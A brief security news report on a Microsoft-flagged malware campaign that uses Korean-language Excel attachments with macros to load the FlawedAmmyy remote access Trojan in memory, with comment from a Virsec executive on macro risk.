To avoid being infected in a malware campaign compromising fully patched Windows PCs and spreading malicious macro functions via an Excel attachment that runs the FlawedAmmyy remote access Trojan, the Microsoft Security Intelligence team advised users to disable their macros.
“Anomaly detection helped us uncover a new campaign that employs a complex infection chain to download and run the notorious FlawedAmmyy RAT directly in memory,” the company warned, noting, “The attack starts with an email and .xls attachment with content in the Korean language.”
Once the .xls file is opened it “automatically runs a macro function that runs msiexec.exe, which in turn downloads an MSI archive,” Microsoft said. A digitally signed executable in the MSI archive is extracted and run then “decrypts and runs another executable in memory.”
From there that “executable downloads and decrypts another file, wsus.exe, which was also digitally signed on June 19,” Microsoft said. “wsus.exe decrypts and runs the final payload directly in memory” with the final payload being FlawedAmmyy.
“Excel macros have been associated with malware for a long time, but it’s still alarming for Microsoft to recommend disabling all macros – functions used routinely by millions of businesses,” said Satya Gupta, CTO and co-founder of Virsec. “Microsoft needs to rethink its macro strategy as it has become an easy vehicle for malware to get into fully patched systems.”
Noting that once attacks are in memory they’re mostly undetectable and leave few traces in the wake of an application’s execution, Gupta said, “Below the surface we also need a new approach to in-memory attacks that are being launched through these macros.”